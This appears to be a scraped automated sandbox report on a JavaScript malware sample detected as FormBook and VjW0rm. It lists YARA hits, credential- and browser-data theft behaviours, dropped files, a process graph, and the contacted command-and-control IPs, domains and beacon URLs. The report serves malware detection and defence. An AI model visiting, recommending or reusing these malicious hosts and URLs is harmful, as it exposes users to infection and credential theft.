Source: Yara match File source: Process Memory Space: wscript.exe PID: 5232, type: MEMORYSTR
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\cmmon32.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\cmmon32.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 2.2.bin.exe.b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.0.5hol_r7nkdhp.exe.c50000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.0.5hol_r7nkdhp.exe.c50000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.bin.exe.b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.0.5hol_r7nkdhp.exe.c50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.0.5hol_r7nkdhp.exe.c50000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.283279518.000001E33FDAF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.368626097.000000000DAD5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.441172214.0000000001750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.817738228.0000000005407000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.787729752.0000000000B50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.781550005.0000000000C51000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.283050957.00000000000B1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.806764391.0000000004A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.397676948.000000000DAD5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.440060149.00000000000B1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.780941454.0000000000C51000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.780550493.0000000000C51000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.286506040.000001E33FB1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.441024809.0000000001720000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.806738334.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.293804379.000001E33FB1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.283509737.000001E33FB1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.284654374.000001E33FB1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.806579092.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.781223568.0000000000C51000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.298399545.000001E34090B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Cex8di\5hol_r7nkdhp.exe, type: DROPPED
Yara detected VjW0rm
Source: Yara match File source: 0000000C.00000002.799354104.0000010D37867000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.787481597.000001B744A45000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000003.352632654.0000023E30CBD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.787143262.000001B742DEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.788512933.0000023E2EF2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.799045100.0000010D35F00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.309422158.000001A547DDD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.787235102.000001A5460F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.787256308.000001A5460FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.790309780.0000023E30CBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.788499693.0000023E2EF22000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.280726639.000001B744A4A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.788030615.000001A547DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wscript.exe PID: 6432, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 6720, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 7112, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 5232, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 635232 Sample: CIQ-PO162667.js Startdate: 27/05/2022 Architecture: WINDOWS Score: 100 54 www.sekolahkejepang.com 2->54 56 www.salondutaxi.com 2->56 58 7 other IPs or domains 2->58 76 Snort IDS alert for network traffic 2->76 78 Multi AV Scanner detection for domain / URL 2->78 80 Found malware configuration 2->80 82 14 other signatures 2->82 11 wscript.exe 3 2->11         started        signatures3 process4 file5 50 C:\Users\user\AppData\Local\Temp\bin.exe, PE32 11->50 dropped 52 C:\Users\user\AppData\Roaming\JmtwmJXhXe.js, ASCII 11->52 dropped 100 System process connects to network (likely due to code injection or exploit) 11->100 102 Benign windows process drops PE files 11->102 104 Drops script or batch files to the startup folder 11->104 106 2 other signatures 11->106 15 bin.exe 11->15         started        18 wscript.exe 2 13 11->18         started        signatures6 process7 dnsIp8 108 Antivirus detection for dropped file 15->108 110 Multi AV Scanner detection for dropped file 15->110 112 Machine Learning detection for dropped file 15->112 114 4 other signatures 15->114 22 explorer.exe 2 6 15->22 injected 60 dilshadkhan.duia.ro 91.193.75.133, 49740, 49742, 49743 DAVID_CRAIGGG Serbia 18->60 46 C:\Users\user\AppData\...\JmtwmJXhXe.js, ASCII 18->46 dropped file9 signatures10 process11 dnsIp12 62 liveafunday.xyz 172.96.186.204, 49819, 49820, 49821 SINGLEHOP-LLCUS Canada 22->62 64 www.topings33.com 162.0.230.89, 49810, 49945, 49946 NAMECHEAP-NETUS Canada 22->64 66 20 other IPs or domains 22->66 48 C:\Users\user\AppData\...\5hol_r7nkdhp.exe, PE32 22->48 dropped 86 System process connects to network (likely due to code injection or exploit) 22->86 88 Performs DNS queries to domains with low reputation 22->88 27 cmmon32.exe 1 12 22->27         started        30 wscript.exe 12 22->30         started        33 wscript.exe 12 22->33         started        35 2 other processes 22->35 file13 signatures14 process15 dnsIp16 90 Tries to steal Mail credentials (via file / registry access) 27->90 92 Creates multiple autostart registry keys 27->92 94 Tries to harvest and steal browser information (history, passwords, etc) 27->94 98 3 other signatures 27->98 37 cmd.exe 27->37         started        40 cmd.exe 27->40         started        68 dilshadkhan.duia.ro 30->68 96 System process connects to network (likely due to code injection or exploit) 30->96 70 dilshadkhan.duia.ro 33->70 72 dilshadkhan.duia.ro 35->72 74 192.168.2.1 unknown unknown 35->74 signatures17 process18 signatures19 84 Tries to harvest and steal browser information (history, passwords, etc) 37->84 42 conhost.exe 37->42         started        44 conhost.exe 40->44         started        process20
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
154.220.100.142
 www.interlink-travel.com Seychelles
133201 COMING-ASABCDEGROUPCOMPANYLIMITEDHK true
160.153.136.3
 rasheedabossmoves.com United States
21501 GODADDY-AMSDE true
3.64.163.50
 www.brandpay.xyz United States
16509 AMAZON-02US true
104.21.4.45
 www.2264a.com United States
13335 CLOUDFLARENETUS true
85.159.66.93
 natroredirect.natrocdn.com Turkey
34619 CIZGITR true
162.0.230.89
 www.topings33.com Canada
22612 NAMECHEAP-NETUS true
132.148.165.111
 kishanshree.com United States
26496 AS-26496-GO-DADDY-COM-LLCUS true
134.122.201.217
 www.o7oiwlp.xyz United States
64050 BCPL-SGBGPNETGlobalASNSG true
52.17.85.125
 shop.freewebstore.org United States
16509 AMAZON-02US false
137.220.133.198
 www.ratebill.com Singapore
64050 BCPL-SGBGPNETGlobalASNSG true
34.102.136.180
 heavymettlelawyers.com United States
15169 GOOGLEUS false
172.96.186.204
 liveafunday.xyz Canada
32475 SINGLEHOP-LLCUS true
91.193.75.133
 dilshadkhan.duia.ro Serbia
209623 DAVID_CRAIGGG true

Private

IP
192.168.2.1

Contacted Domains

Name IP Active
www.ratebill.com 137.220.133.198 true
rasheedabossmoves.com 160.153.136.3 true
dilshadkhan.duia.ro 91.193.75.133 true
sekolahkejepang.com 103.247.11.212 true
www.topings33.com 162.0.230.89 true
natroredirect.natrocdn.com 85.159.66.93 true
shop.freewebstore.org 52.17.85.125 true
www.interlink-travel.com 154.220.100.142 true
www.2264a.com 104.21.4.45 true
heavymettlelawyers.com 34.102.136.180 true
www.salondutaxi.com 188.114.96.3 true
liveafunday.xyz 172.96.186.204 true
www.screeshot.com 185.53.179.170 true
kishanshree.com 132.148.165.111 true
www.o7oiwlp.xyz 134.122.201.217 true
www.brandpay.xyz 3.64.163.50 true
www.shcylzc.com 23.82.37.10 true
www.kishanshree.com unknown unknown
www.rasheedabossmoves.com unknown unknown
www.jdhwh2nbiw234.com unknown unknown
www.sekolahkejepang.com unknown unknown
www.siberup.xyz unknown unknown
www.brawlhallacodestore.com unknown unknown
www.heavymettlelawyers.com unknown unknown
www.gafcbooster.com unknown unknown
www.liveafunday.xyz unknown unknown
www.thepowerofanopenquestion.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.ratebill.com/np8s/ true
  • Avira URL Cloud: malware
 unknown
http://www.liveafunday.xyz/np8s/?Bl=lHUDzXfpVJ_&c2MH6DeP=z2yIa7cx1SROgCPUWMRj7QFmCzRewXUzLnClNkjkn7TUjkjwrW0kK9KMlL9EtH2oI1i9 true
  • Avira URL Cloud: safe
 unknown
http://www.o7oiwlp.xyz/np8s/?c2MH6DeP=Wi2RbeLHGdcMG/4zbWZrHjxVNTurLVF13zSFjScR2hfe23jELpoygCvTVMXCwbd5YdLw&hFQL=JXUhrvXxUhF4 true
  • Avira URL Cloud: phishing
 unknown
http://www.interlink-travel.com/np8s/?c2MH6DeP=O5u6OlqxnDtTF3riQ4xVZIWxoHxK/fTzbXBC76K0hST926FmxCw4JGrgecy53rLpUaVG&hFQL=JXUhrvXxUhF4 true
  • Avira URL Cloud: malware
 unknown
http://www.heavymettlelawyers.com/np8s/?c2MH6DeP=sGHpREHB6zr3UC4aQViiUpNRv9hYNnMtmn0rCl8QdyZ+urDz6JFWhhwh7EVf+dC28syJ&hFQL=JXUhrvXxUhF4 false
  • Avira URL Cloud: malware
 unknown
www.gafcbooster.com/np8s/ true
  • Avira URL Cloud: malware
 low
http://www.kishanshree.com/np8s/?c2MH6DeP=vlrq3Iq6CNBS64Mt3AOFKZFqCoQQX/EcbdCgZyJL/t2S6EN96XJkdyy29bgYyDpdikhs&hFQL=JXUhrvXxUhF4 true
  • Avira URL Cloud: safe
 unknown
http://www.rasheedabossmoves.com/np8s/ true
  • Avira URL Cloud: malware
 unknown
http://www.interlink-travel.com/np8s/ true
  • Avira URL Cloud: malware
 unknown
http://www.topings33.com/np8s/?c2MH6DeP=+1vSQSU4VFPBNkL8EMH3DU8MRg7YeuqbcMOylP3M0ivye7s4zRc3erRZEPodkGcNW4yt&hFQL=JXUhrvXxUhF4 true
  • Avira URL Cloud: malware
 unknown
http://www.liveafunday.xyz/np8s/?c2MH6DeP=z2yIa7cx1SROgCPUWMRj7QFmCzRewXUzLnClNkjkn7TUjkjwrW0kK9KMlL9EtH2oI1i9&hFQL=JXUhrvXxUhF4 true
  • Avira URL Cloud: safe
 unknown
http://www.2264a.com/np8s/ true
  • Avira URL Cloud: malware
 unknown
http://www.brandpay.xyz/np8s/?c2MH6DeP=hgAcLcCQcJ9fw2P/Tuk0sK1oy/IuL6u1zsG1wPPsT2rq6CikgixxXMntvJFJ21PsUjiZ&hFQL=JXUhrvXxUhF4 true
  • Avira URL Cloud: phishing
 unknown
http://www.rasheedabossmoves.com/np8s/?c2MH6DeP=pvCvVC1srqMzTu3vjZ/Pi4S7puQ7WYlroZs2vwEH9SE4BkgUF4SEMyF7QpXUX37idvZ6&hFQL=JXUhrvXxUhF4 true
  • Avira URL Cloud: malware
 unknown
http://www.siberup.xyz/np8s/?c2MH6DeP=cDXfWuCokJFrdCwhVntnDB+RdogU7uBP5U/Sv42Lexzi+FyRpCsvSOHB1ClRHn4SxuGj&hFQL=JXUhrvXxUhF4 true
  • Avira URL Cloud: safe
 unknown
http://www.2264a.com/np8s/?c2MH6DeP=SaZV+ETfGqRGg8UpLQ9gT5lpaRa7t1Wyj9mLK06zGilC1KjP8kiErJAXediVB/P9DJGG&hFQL=JXUhrvXxUhF4 true
  • Avira URL Cloud: malware
 unknown
http://www.brawlhallacodestore.com/np8s/?c2MH6DeP=SjFSW0qH8X1Gu/+4r88YNPSLQa2KKx1h4LPt291Cc0nRXdmgbio7b0swgPTE4uOj94VU&hFQL=JXUhrvXxUhF4 true
  • Avira URL Cloud: malware
 unknown
http://www.topings33.com/np8s/ true
  • Avira URL Cloud: malware
 unknown
http://www.liveafunday.xyz/np8s/ true
  • Avira URL Cloud: safe
 unknown
http://www.siberup.xyz/np8s/ true
  • Avira URL Cloud: safe
 unknown
http://www.ratebill.com/np8s/?c2MH6DeP=OAQ8ZAk71VYHsoGBQeS0cLLvyBMKMlAsSK0ta2CkcQgnl+jMatCDHwZEkCDKr1q9/u4Y&hFQL=JXUhrvXxUhF4 true
  • Avira URL Cloud: malware
 unknown
http://www.kishanshree.com/np8s/ true
  • Avira URL Cloud: safe
 unknown
http://www.o7oiwlp.xyz/np8s/ true
  • Avira URL Cloud: phishing
 unknown
http://www.heavymettlelawyers.com/np8s/ false
  • Avira URL Cloud: malware
 unknown
http://www.interlink-travel.com/np8s/?Bl=lHUDzXfpVJ_&c2MH6DeP=O5u6OlqxnDtTF3riQ4xVZIWxoHxK/fTzbXBC76K0hST926FmxCw4JGrgecy53rLpUaVG true
  • Avira URL Cloud: malware
 unknown
http://www.o7oiwlp.xyz/np8s/?Bl=lHUDzXfpVJ_&c2MH6DeP=Wi2RbeLHGdcMG/4zbWZrHjxVNTurLVF13zSFjScR2hfe23jELpoygCvTVMXCwbd5YdLw true
  • Avira URL Cloud: phishing
 unknown